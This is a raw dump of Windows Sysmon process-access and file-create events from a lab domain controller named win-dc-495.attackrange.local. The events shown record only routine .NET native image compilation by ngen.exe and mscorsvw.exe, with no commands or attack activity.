11241100x80000000000000005510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:51.783{59A5CD1D-90D2-6005-4B01-00000000A301}3504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\db0-0\System.Management.dll2021-01-18 13:44:51.783 10341000x80000000000000005523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.189{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D4-6005-4F01-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.189{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D4-6005-4F01-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.189{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D4-6005-4F01-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D4-6005-4E01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.001{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D4-6005-4E01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:52.001{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D4-6005-4E01-00000000A301}1068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D5-6005-5201-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.783{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D5-6005-5201-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.783{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D5-6005-5201-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.751{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D5-6005-5101-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.736{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D5-6005-5101-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.736{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D5-6005-5101-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D5-6005-5001-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.689{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D5-6005-5001-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:53.689{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D5-6005-5001-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:53.595{59A5CD1D-90D4-6005-4F01-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\580-0\Microsoft.VisualBasic.dll2021-01-18 13:44:53.595 10341000x80000000000000005540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D6-6005-5401-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.751{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D6-6005-5401-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.751{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D6-6005-5401-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.704{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D6-6005-5301-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.689{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D6-6005-5301-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:54.689{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D6-6005-5301-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:54.611{59A5CD1D-90D5-6005-5201-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1008-0\System.DirectoryServices.dll2021-01-18 13:44:54.611 10341000x80000000000000005547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.814{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D7-6005-5601-00000000A301}3060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.798{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D7-6005-5601-00000000A301}3060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:55.798{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D7-6005-5601-00000000A301}3060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 